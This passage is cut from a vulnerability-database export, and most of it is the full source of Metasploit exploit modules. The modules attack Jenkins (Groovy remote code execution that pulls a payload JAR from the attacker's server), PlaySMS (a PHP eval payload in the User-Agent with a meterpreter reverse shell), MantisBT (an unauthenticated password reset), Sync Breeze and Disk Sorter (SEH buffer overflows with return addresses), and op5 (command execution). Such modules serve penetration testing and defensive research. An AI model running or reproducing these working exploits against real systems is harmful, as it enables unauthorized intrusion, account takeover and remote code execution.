go-go-gadgets')\n send_request_cgi(\n 'method' => 'GET',\n 'uri' => go_go_gadget1,\n 'vars_get' => vars_get\n )\n end\n\n #\n # Exploit methods\n #\n\n=begin\n http://jenkins.local/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword\n ?apiUrl=http://169.254.169.254/%23\n &login=orange\n &password=tsai\n=end\n def go_go_gadget1(custom_uri = nil)\n # NOTE: See CVE-2018-1000408 for why we don't want to randomize the username\n acl_bypass = normalize_uri(target_uri.path, '/securityRealm/user/admin')\n\n return normalize_uri(acl_bypass, custom_uri) if custom_uri\n\n rce_base = 
normalize_uri(acl_bypass, 'descriptorByName')\n\n rce_uri =\n case target['Type']\n when :unix_memory\n '/org.jenkinsci.plugins.' \\\n 'scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript'\n when :java_dropper\n '/org.jenkinsci.plugins.' \\\n 'workflow.cps.CpsFlowDefinition/checkScriptCompile'\n end\n\n normalize_uri(rce_base, rce_uri)\n end\n\n=begin\n http://jenkins.local/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile\n ?value=\n @GrabConfig(disableChecksums=true)%0a\n @GrabResolver(name='orange.tw', root='http://[your_host]/')%0a\n @Grab(group='tw.orange', module='poc', version='1')%0a\n import Orange;\n=end\n def go_go_gadget2\n case target['Type']\n when :unix_memory\n payload_escaped = payload.encoded.gsub(\"'\", \"\\\\'\")\n\n (\n <<~EOF\n class #{app} {\n #{app}() {\n ['sh', '-c', '#{payload_escaped}'].execute()\n }\n }\n EOF\n ).strip\n when :java_dropper\n (\n <<~EOF\n @GrabConfig(disableChecksums=true)\n @GrabResolver('http://#{srvhost_addr}:#{srvport}')\n @Grab('#{vendor}:#{app}:#{version}')\n import #{app}\n EOF\n ).strip\n end\n end\n\n #\n # Payload methods\n #\n\n #\n # If you deviate from the following sequence, you will suffer!\n #\n # HEAD /path/to/pom.xml -> 404\n # HEAD /path/to/payload.jar -> 200\n # GET /path/to/payload.jar -> 200\n #\n def on_request_uri(cli, request)\n vprint_status(\"#{request.method} #{request.uri} requested\")\n\n unless %w[HEAD GET].include?(request.method)\n vprint_error(\"Ignoring #{request.method} request\")\n return\n end\n\n if request.method == 'HEAD'\n if request.uri != payload_uri\n vprint_error('Sending 404')\n return send_not_found(cli)\n end\n\n vprint_good('Sending 200')\n return send_response(cli, '')\n end\n\n if request.uri != payload_uri\n vprint_error('Sending bogus file')\n return send_response(cli, \"#{Faker::Hacker.say_something_smart}\\n\")\n end\n\n vprint_good('Sending payload JAR')\n send_response(\n cli,\n payload_jar,\n 'Content-Type' => 
'application/java-archive'\n )\n\n # XXX: $HOME may not work in some cases\n register_dir_for_cleanup(\"$HOME/.groovy/grapes/#{vendor}\")\n end\n\n def payload_jar\n jar = payload.encoded_jar\n\n jar.add_file(\"#{app}.class\", exploit_class)\n jar.add_file(\n 'META-INF/services/org.codehaus.groovy.plugins.Runners',\n \"#{app}\\n\"\n )\n\n jar.pack\n end\n\n=begin javac Exploit.java\n import metasploit.Payload;\n\n public class Exploit {\n public Exploit(){\n try {\n Payload.main(null);\n } catch (Exception e) { }\n\n }\n }\n=end\n def exploit_class\n klass = Rex::Text.decode_base64(\n <<~EOF\n yv66vgAAADMAFQoABQAMCgANAA4HAA8HABAHABEBAAY8aW5pdD4BAAMoKVYB\n AARDb2RlAQANU3RhY2tNYXBUYWJsZQcAEAcADwwABgAHBwASDAATABQBABNq\n YXZhL2xhbmcvRXhjZXB0aW9uAQAHRXhwbG9pdAEAEGphdmEvbGFuZy9PYmpl\n Y3QBABJtZXRhc3Bsb2l0L1BheWxvYWQBAARtYWluAQAWKFtMamF2YS9sYW5n\n L1N0cmluZzspVgAhAAQABQAAAAAAAQABAAYABwABAAgAAAA3AAEAAgAAAA0q\n twABAbgAAqcABEyxAAEABAAIAAsAAwABAAkAAAAQAAL/AAsAAQcACgABBwAL\n AAAA\n EOF\n )\n\n # Replace length-prefixed string \"Exploit\" with a random one\n klass.sub(/.Exploit/, \"#{[app.length].pack('C')}#{app}\")\n end\n\n #\n # Utility methods\n #\n\n def payload_uri\n \"/#{vendor}/#{app}/#{version}/#{app}-#{version}.jar\"\n end\n\n def vendor\n @vendor ||= Faker::App.author.split(/[^[:alpha:]]/).join\n end\n\n def app\n @app ||= Faker::App.name.split(/[^[:alpha:]]/).join\n end\n\n def version\n @version ||= Faker::App.semantic_version\n end\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/jenkins_metaprogramming.rb"}, {"lastseen": "2019-11-11T12:38:36", "bulletinFamily": "exploit", "description": "This module exploits an authenticated file upload remote code excution vulnerability in PlaySMS Version 1.4. This issue is caused by improper file contents handling in import.php (aka the Phonebook import feature). 
Authenticated Users can upload a CSV file containing a malicious payload via vectors involving the User-Agent HTTP header and PHP code in the User-Agent. This module was tested against PlaySMS 1.4 on VulnHub's Dina 1.0 machine and Windows 7.\n", "modified": "2018-05-07T14:22:21", "published": "2018-05-07T13:25:22", "id": "MSF:EXPLOIT/MULTI/HTTP/PLAYSMS_UPLOADCSV_EXEC", "href": "", "type": "metasploit", "title": "PlaySMS import.php Authenticated CSV File Upload Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PlaySMS import.php Authenticated CSV File Upload Code Execution',\n 'Description' => %q{\n This module exploits an authenticated file upload remote code excution vulnerability\n in PlaySMS Version 1.4. This issue is caused by improper file contents handling in\n import.php (aka the Phonebook import feature). 
Authenticated Users can upload a CSV\n file containing a malicious payload via vectors involving the User-Agent HTTP header\n and PHP code in the User-Agent.\n This module was tested against PlaySMS 1.4 on VulnHub's Dina 1.0 machine and Windows 7.\n },\n 'Author' =>\n [\n 'Touhid M.Shaikh <touhidshaikh22[at]gmail.com>' # Discoverys and Metasploit Module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE','2017-9101'],\n ['URL','https://www.youtube.com/watch?v=KIB9sKQdEwE'],\n ['EDB','42044']\n ],\n 'DefaultOptions' =>\n {\n 'SSL' => false,\n 'PAYLOAD' => 'php/meterpreter/reverse_tcp',\n 'ENCODER' => 'php/base64',\n },\n 'Privileged' => false,\n 'Platform' => ['php'],\n 'Arch' => ARCH_PHP,\n 'Targets' =>\n [\n [ 'PlaySMS 1.4', { } ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'May 21 2017'))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, \"Base playsms directory path\", '/']),\n OptString.new('USERNAME', [ true, \"Username to authenticate with\", 'admin']),\n OptString.new('PASSWORD', [ true, \"Password to authenticate with\", 'admin'])\n ])\n end\n\n def uri\n return target_uri.path\n end\n\n def check\n begin\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(uri, 'index.php')\n })\n rescue\n vprint_error('Unable to access the index.php file')\n return CheckCode::Unknown\n end\n\n if res.code == 302 && res.headers['Location'].include?('index.php?app=main&inc=core_auth&route=login')\n return Exploit::CheckCode::Appears\n end\n\n return CheckCode::Safe\n end\n\n def login\n res = send_request_cgi({\n 'uri' => normalize_uri(uri, 'index.php'),\n 'method' => 'GET',\n 'vars_get' => {\n 'app' => 'main',\n 'inc' => 'core_auth',\n 'route' => 'login',\n }\n })\n\n # Grabbing CSRF token from body\n /name=\"X-CSRF-Token\" value=\"(?<csrf>[a-z0-9\"]+)\">/ =~ res.body\n fail_with(Failure::UnexpectedReply, \"#{peer} - Could not determine CSRF token\") if csrf.nil?\n vprint_good(\"X-CSRF-Token for login : #{csrf}\")\n\n 
cookies = res.get_cookies\n vprint_status('Trying to Login ......')\n # Send Creds with cookies.\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(uri, 'index.php'),\n 'cookie' => cookies,\n 'vars_get' => Hash[{\n 'app' => 'main',\n 'inc' => 'core_auth',\n 'route' => 'login',\n 'op' => 'login',\n }.to_a.shuffle],\n 'vars_post' => Hash[{\n 'X-CSRF-Token' => csrf,\n 'username' => datastore['USERNAME'],\n 'password' => datastore['PASSWORD']\n }.to_a.shuffle],\n })\n\n fail_with(Failure::UnexpectedReply, \"#{peer} - Did not respond to Login request\") if res.nil?\n\n # Try to access index page with authenticated cookie.\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(uri, 'index.php'),\n 'cookie' => cookies,\n })\n\n # if we redirect to core_welcome dan we assume we have authenticated cookie.\n if res.code == 302 && res.headers['Location'].include?('index.php?app=main&inc=core_welcome')\n print_good(\"Authentication successful: #{datastore['USERNAME']}:#{datastore['PASSWORD']}\")\n store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])\n return cookies\n else\n fail_with(Failure::UnexpectedReply, \"#{peer} - Authentication Failed :[ #{datastore['USERNAME']}:#{datastore['PASSWORD']} ]\")\n end\n end\n\n\n # Tested successfully on Dina: 1.0.1 machine on vulnhub.\n # Link : https://www.vulnhub.com/entry/dina-101,200/\n def exploit\n\n cookies = login\n\n # Agian CSRF token.\n res = send_request_cgi({\n 'uri' => normalize_uri(uri, 'index.php'),\n 'method' => 'GET',\n 'cookie' => cookies,\n 'vars_get' => Hash[{\n 'app' => 'main',\n 'inc' => 'feature_phonebook',\n 'route' => 'import',\n 'op' => 'list',\n }.to_a.shuffle]\n })\n\n fail_with(Failure::UnexpectedReply, \"#{peer} - Did not respond to Login request\") if res.nil?\n\n # Grabbing CSRF token from body\n /name=\"X-CSRF-Token\" value=\"(?<csrf>[a-z0-9\"]+)\">/ =~ res.body\n fail_with(Failure::UnexpectedReply, \"#{peer} - Could not determine 
CSRF token\") if csrf.nil?\n vprint_good(\"X-CSRF-Token for upload : #{csrf}\")\n\n # Payload.\n evil = \"<?php $t=$_SERVER['HTTP_USER_AGENT']; eval($t); ?>\"\n #making csv file body\n final_csv = \"Name,Email,Department\\n\"\n final_csv << \"#{evil},#{rand(1..100)},#{rand(1..100)}\"\n # setup POST request.\n post_data = Rex::MIME::Message.new\n post_data.add_part(csrf, content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name=\"X-CSRF-Token\"') # CSRF token\n post_data.add_part(final_csv, content_type = 'text/csv', transfer_encoding = nil, content_disposition = 'form-data; name=\"fnpb\"; filename=\"agent22.csv\"') #payload\n data = post_data.to_s\n\n vprint_status('Trying to upload malicious CSV file ....')\n # Lets Send Upload request.\n res = send_request_cgi({\n 'uri' => normalize_uri(uri, 'index.php'),\n 'method' => 'POST',\n 'agent' => payload.encode,\n 'cookie' => cookies,\n 'vars_get' => Hash[{\n 'app' => 'main',\n 'inc' => 'feature_phonebook',\n 'route' => 'import',\n 'op' => 'import',\n }.to_a.shuffle],\n 'headers' => {\n 'Upgrade-Insecure-Requests' => '1',\n },\n 'Connection' => 'close',\n 'data' => data,\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\n })\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/playsms_uploadcsv_exec.rb"}, {"lastseen": "2019-11-19T00:26:30", "bulletinFamily": "exploit", "description": "MantisBT before 1.3.10, 2.2.4, and 2.3.1 are vulnerable to unauthenticated password reset.\n", "modified": "2017-07-24T13:26:21", "published": "2017-07-09T00:14:21", "id": "MSF:AUXILIARY/ADMIN/HTTP/MANTISBT_PASSWORD_RESET", "href": "", "type": "metasploit", "title": "MantisBT password reset", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule 
< Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MantisBT password reset\",\n 'Description' => %q{\n MantisBT before 1.3.10, 2.2.4, and 2.3.1 are vulnerable to unauthenticated password reset.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'John (hyp3rlinx) Page', # initial discovery\n 'Julien (jvoisin) Voisin' # metasploit module\n ],\n 'References' =>\n [\n ['CVE', '2017-7615'],\n ['EDB', '41890'],\n ['URL', 'https://mantisbt.org/bugs/view.php?id=22690'],\n ['URL', 'http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt']\n ],\n 'Platform' => ['win', 'linux'],\n 'DisclosureDate' => \"Apr 16 2017\"))\n\n register_options(\n [\n OptString.new('USERID', [ true, 'User id to reset', 1]),\n OptString.new('PASSWORD', [ false, 'The new password to set (blank for random)', '']),\n OptString.new('TARGETURI', [ true, 'Relative URI of MantisBT installation', '/'])\n ]\n )\n end\n\n def check\n begin\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, '/login_page.php'),\n 'method'=>'GET'\n })\n\n if res && res.body && res.body.include?('Powered by <a href=\"http://www.mantisbt.org\" title=\"bug tracking software\">MantisBT')\n vprint_status(\"MantisBT detected\")\n return Exploit::CheckCode::Detected\n else\n vprint_status(\"Not a MantisBT Instance!\")\n return Exploit::CheckCode::Safe\n end\n\n rescue Rex::ConnectionRefused\n print_error(\"Connection refused by server.\")\n return Exploit::CheckCode::Safe\n end\n end\n\n def run\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, '/verify.php'),\n 'method' => 'GET',\n 'vars_get' => {\n 'id' => datastore['USERID'],\n 'confirm_hash' => ''\n }\n })\n\n if !res || !res.body\n fail_with(Failure::UnexpectedReply, \"Error in server response. Ensure the server IP is correct.\")\n end\n\n cookie = res.get_cookies\n\n if cookie == '' || !(res.body.include? 
'Your account information has been verified.')\n fail_with(Failure::NoAccess, \"Authentication failed\")\n end\n\n\n if datastore['PASSWORD'].blank?\n password = Rex::Text.rand_text_alpha(8)\n else\n password = datastore['PASSWORD']\n end\n\n if res.body =~ /<input type=\"hidden\" name=\"account_update_token\" value=\"([a-zA-Z0-9_-]+)\"/\n token = $1\n else\n fail_with(Failure::UnexpectedReply, 'Could not retrieve account_update_token')\n end\n\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, '/account_update.php'),\n 'method' => 'POST',\n 'vars_post' => {\n 'verify_user_id' => datastore['USERID'],\n 'account_update_token' => $1,\n 'realname' => Rex::Text.rand_text_alpha(rand(5) + 8),\n 'password' => password,\n 'password_confirm' => password\n },\n 'cookie' => cookie\n })\n\n if res && res.body && res.body.include?('Password successfully updated')\n print_good(\"Password successfully changed to '#{password}'.\")\n else\n fail_with(Failure::UnexpectedReply, 'Something went wrong, the password was not changed.')\n end\n end\nend\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/http/mantisbt_password_reset.rb"}, {"lastseen": "2019-11-03T03:06:40", "bulletinFamily": "exploit", "description": "This module exploits a stack-based buffer overflow vulnerability in the web interface of Sync Breeze Enterprise v9.4.28, v10.0.28, and v10.1.16, caused by improper bounds checking of the request in HTTP GET and POST requests sent to the built-in web server. 
This module has been tested successfully on Windows 7 SP1 x86.\n", "modified": "2018-07-12T22:34:52", "published": "2017-05-17T09:53:28", "id": "MSF:EXPLOIT/WINDOWS/HTTP/SYNCBREEZE_BOF", "href": "", "type": "metasploit", "title": "Sync Breeze Enterprise GET Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Seh\n include Msf::Exploit::Remote::Egghunter\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Sync Breeze Enterprise GET Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack-based buffer overflow vulnerability\n in the web interface of Sync Breeze Enterprise v9.4.28, v10.0.28,\n and v10.1.16, caused by improper bounds checking of the request in\n HTTP GET and POST requests sent to the built-in web server. 
This\n module has been tested successfully on Windows 7 SP1 x86.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Daniel Teixeira',\n 'Andrew Smith', # MSF support for v10.0.28\n 'Owais Mehtab', # Original v10.0.28 exploit\n 'Milton Valencia (wetw0rk)' # MSF support for v10.1.16\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread'\n },\n 'Platform' => 'win',\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d\\x20\\x26\",\n 'Space' => 500\n },\n 'References' =>\n [\n [ 'CVE', '2017-14980' ],\n ],\n 'Targets' =>\n [\n [\n 'Automatic', {}\n ],\n [ 'Sync Breeze Enterprise v9.4.28',\n {\n 'Offset' => 2488,\n 'Ret' => 0x10015fde # POP # POP # RET [libspp.dll]\n }\n ],\n [ 'Sync Breeze Enterprise v10.0.28',\n {\n 'Offset' => 780,\n 'Ret' => 0x10090c83 # JMP ESP [libspp.dll]\n }\n ],\n [ 'Sync Breeze Enterprise v10.1.16',\n {\n 'Offset' => 2495,\n 'Ret' => 0x1001C65C # POP # POP # RET [libspp.dll]\n }\n ]\n ],\n 'Privileged' => true,\n 'DisclosureDate' => 'Mar 15 2017',\n 'DefaultTarget' => 0))\n end\n\n def get_product_name\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => '/'\n )\n\n if res && res.code == 200\n product_name = res.body.scan(/(Sync Breeze Enterprise v[^<]*)/i).flatten.first\n return product_name if product_name\n end\n\n nil\n end\n\n def check\n product_name = get_product_name\n return Exploit::CheckCode::Unknown unless product_name\n\n if product_name =~ /9\\.4\\.28/ || product_name =~ /10\\.0\\.28/\n return Exploit::CheckCode::Appears\n elsif product_name =~ /Sync Breeze Enterprise/\n return Exploit::CheckCode::Detected\n end\n\n Exploit::CheckCode::Safe\n end\n\n def get_target_name\n if target.name != 'Automatic'\n print_status(\"Target manually set as #{target.name}\")\n return target\n else\n print_status('Automatically detecting target...')\n end\n\n case get_product_name\n when /9\\.4\\.28/\n print_status('Target is 9.4.28')\n return targets[1]\n when /10\\.0\\.28/\n print_status('Target is 10.0.28')\n return targets[2]\n 
when /10\\.1\\.16/\n print_status('Target is 10.1.16')\n return targets[3]\n else\n nil\n end\n end\n\n def exploit\n tmp_target = target\n case get_target_name\n when targets[1]\n target = targets[1]\n eggoptions = {\n checksum: true,\n eggtag: rand_text_alpha(4, payload_badchars)\n }\n\n hunter, egg = generate_egghunter(\n payload.encoded,\n payload_badchars,\n eggoptions\n )\n\n sploit = rand_text_alpha(target['Offset'])\n sploit << generate_seh_record(target.ret)\n sploit << hunter\n sploit << make_nops(10)\n sploit << egg\n sploit << rand_text_alpha(5500)\n\n print_status('Sending request...')\n\n send_request_cgi(\n 'method' => 'GET',\n 'uri' => sploit\n )\n\n when targets[2]\n target = targets[2]\n uri = \"/login\"\n sploit = rand_text_alpha(target['Offset'])\n sploit << [target.ret].pack('V')\n sploit << rand_text(4)\n make_nops(10)\n sploit << payload.encoded\n\n print_status('Sending request...')\n\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => uri,\n 'vars_post' => {\n 'username' => \"#{sploit}\",\n 'password' => \"rawr\"\n }\n )\n when targets[3]\n target = targets[3]\n\n eggoptions = {\n checksum: true,\n eggtag: rand_text_alpha(4, payload_badchars)\n }\n\n hunter, egg = generate_egghunter(\n payload.encoded,\n payload_badchars,\n eggoptions\n )\n\n sploit = payload.encoded\n sploit << rand_text_alpha(target['Offset'] - payload.encoded.length, payload_badchars)\n sploit << generate_seh_record(target.ret)\n sploit << hunter\n # Push the payload out of this buffer, which will make the hunter look for the payload\n # somewhere else that has the complete payload.\n sploit << make_nops(200)\n sploit << egg\n sploit << rand_text_alpha(9067 - sploit.length, payload_badchars)\n\n send_request_cgi(\n 'uri' => \"/#{sploit}\",\n 'method' => 'GET'\n )\n else\n print_error(\"Exploit not suitable for this target.\")\n end\n ensure\n target = tmp_target\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/syncbreeze_bof.rb"}, {"lastseen": "2019-12-03T16:59:58", "bulletinFamily": "exploit", "description": "This module exploits a stack-based buffer overflow vulnerability in the web interface of Disk Sorter Enterprise v9.5.12, caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows 7 SP1 x86.\n", "modified": "2018-07-12T22:34:52", "published": "2017-04-19T09:57:41", "id": "MSF:EXPLOIT/WINDOWS/HTTP/DISKSORTER_BOF", "href": "", "type": "metasploit", "title": "Disk Sorter Enterprise GET Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Seh\n include Msf::Exploit::Remote::Egghunter\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Disk Sorter Enterprise GET Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack-based buffer overflow vulnerability\n in the web interface of Disk Sorter Enterprise v9.5.12, caused by\n improper bounds checking of the request path in HTTP GET requests\n sent to the built-in web server. 
This module has been tested\n successfully on Windows 7 SP1 x86.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Daniel Teixeira'\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread'\n },\n 'Platform' => 'win',\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d\\x20\\x26\",\n 'Space' => 500\n },\n 'References' =>\n [\n [ 'CVE', '2017-7230' ]\n ],\n 'Targets' =>\n [\n [ 'Disk Sorter Enterprise v9.5.12',\n {\n 'Offset' => 2488,\n 'Ret' => 0x10051223 # POP # POP # RET [libspp.dll]\n }\n ]\n ],\n 'Privileged' => true,\n 'DisclosureDate' => 'Mar 15 2017',\n 'DefaultTarget' => 0))\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => '/'\n )\n\n if res && res.code == 200\n version = res.body[/Disk Sorter Enterprise v[^<]*/]\n if version\n vprint_status(\"Version detected: #{version}\")\n if version =~ /9\\.5\\.12/\n return Exploit::CheckCode::Appears\n end\n return Exploit::CheckCode::Detected\n end\n else\n vprint_error('Unable to determine due to a HTTP connection timeout')\n return Exploit::CheckCode::Unknown\n end\n\n Exploit::CheckCode::Safe\n end\n\n def exploit\n\n eggoptions = {\n checksum: true,\n eggtag: rand_text_alpha(4, payload_badchars)\n }\n\n hunter, egg = generate_egghunter(\n payload.encoded,\n payload_badchars,\n eggoptions\n )\n\n sploit = rand_text_alpha(target['Offset'])\n sploit << generate_seh_record(target.ret)\n sploit << hunter\n sploit << make_nops(10)\n sploit << egg\n sploit << rand_text_alpha(5500)\n\n print_status('Sending request...')\n\n send_request_cgi(\n 'method' => 'GET',\n 'uri' => sploit\n )\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/disksorter_bof.rb"}, {"lastseen": "2019-12-03T04:47:01", "bulletinFamily": "exploit", "description": "op5 an open source network monitoring software. 
The configuration page in version 7.1.9 and below allows the ability to test a system command, which can be abused to run arbitrary code as an unpriv user.\n", "modified": "2017-07-24T13:26:21", "published": "2016-06-01T19:07:31", "id": "MSF:EXPLOIT/LINUX/HTTP/OP5_CONFIG_EXEC", "href": "", "type": "metasploit", "title": "op5 v7.1.9 Configuration Command Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n Rank = ExcellentRanking\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'op5 v7.1.9 Configuration Command Execution',\n 'Description' => %q(\n op5 an open source network monitoring software.\n The configuration page in version 7.1.9 and below\n allows the ability to test a system command, which\n can be abused to run arbitrary code as an unpriv user.\n ),\n 'Author' =>\n [\n 'h00die <mike@shorebreaksecurity.com>', # module\n 'hyp3rlinx' # discovery\n ],\n 'References' =>\n [\n [ 'EDB', '39676' ],\n [ 'URL', 'https://www.op5.com/blog/news/op5-monitor-7-2-0-release-notes/']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => ['linux', 'unix'],\n 'Privileged' => false,\n 'DefaultOptions' => { 'SSL' => true },\n 'Targets' =>\n [\n [ 'Automatic Target', {}]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Apr 08 2016'\n )\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, 'User to login with', 'monitor']),\n OptString.new('PASSWORD', [ false, 'Password to login with', 'monitor']),\n OptString.new('TARGETURI', [ true, 'The path to the application', '/'])\n ], self.class\n )\n end\n\n def check\n begin\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path),\n 'method' => 'GET'\n )\n fail_with(Failure::UnexpectedReply, \"#{peer} - Could not connect to web 
service - no response\") if res.nil?\n /Version: (?<version>[\\d]{1,2}\\.[\\d]{1,2}\\.[\\d]{1,2})[\\s]+\\|/ =~ res.body\n\n if version && Gem::Version.new(version) <= Gem::Version.new('7.1.9')\n vprint_good(\"Version Detected: #{version}\")\n Exploit::CheckCode::Appears\n else\n Exploit::CheckCode::Safe\n end\n rescue ::Rex::ConnectionError\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect to the web service\")\n end\n end\n\n def exploit\n execute_cmdstager(\n :flavor => :echo\n )\n end\n\n def execute_command(cmd, opts)\n begin\n # To manually view the vuln page, click Manage > Configure > Commands.\n # Click the \"Test this command\" button to display the form we abuse.\n\n # login\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'monitor/index.php/auth/login'),\n 'method' => 'POST',\n 'vars_get' =>\n {\n 'uri' => 'tac/index'\n },\n 'vars_post' =>\n {\n 'csrf_token' => '',\n 'username' => datastore['USERNAME'],\n 'password' => datastore['PASSWORD']\n }\n )\n\n fail_with(Failure::UnexpectedReply, \"#{peer} - Invalid credentials (response code: #{res.code})\") if res.code != 302\n cookie = res.get_cookies\n # exploit\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'monitor/op5/nacoma/command_test.php'),\n 'method' => 'GET',\n 'cookie' => cookie,\n 'vars_get' =>\n {\n 'cmd_str' => cmd\n }\n )\n\n # success means we hang our session, and wont get back a response\n if res\n fail_with(Failure::UnexpectedReply, \"#{peer} - Could not connect to web service - no response\") if res.nil?\n fail_with(Failure::UnexpectedReply, \"#{peer} - Credentials need additional privileges\") if res.body =~ /Access Denied/\n end\n\n rescue ::Rex::ConnectionError\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect to the web service\")\n end\n end\n\n def on_new_session(session)\n super\n session.shell_command_token('setsid $SHELL')\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/op5_config_exec.rb"}, {"lastseen": "2019-11-19T18:26:26", "bulletinFamily": "exploit", "description": "This module exploits a command injection vulnerability discovered in HP SiteScope 11.30 and earlier versions (tested in 11.26 and 11.30). The vulnerability exists in the DNS Tool allowing an attacker to execute arbitrary commands in the context of the service. By default, HP SiteScope installs and runs as SYSTEM in Windows and does not require authentication. This vulnerability only exists on the Windows version. The Linux version is unaffected.\n", "modified": "2017-07-24T13:26:21", "published": "2015-10-09T19:55:48", "id": "MSF:EXPLOIT/WINDOWS/HTTP/HP_SITESCOPE_DNS_TOOL", "href": "", "type": "metasploit", "title": "HP SiteScope DNS Tool Command Injection", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/powershell'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Powershell\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'HP SiteScope DNS Tool Command Injection',\n 'Description' => %q{\n This module exploits a command injection vulnerability\n discovered in HP SiteScope 11.30 and earlier versions (tested in 11.26\n and 11.30). The vulnerability exists in the DNS Tool allowing an\n attacker to execute arbitrary commands in the context of the service. By\n default, HP SiteScope installs and runs as SYSTEM in Windows and does\n not require authentication. This vulnerability only exists on the\n Windows version. 
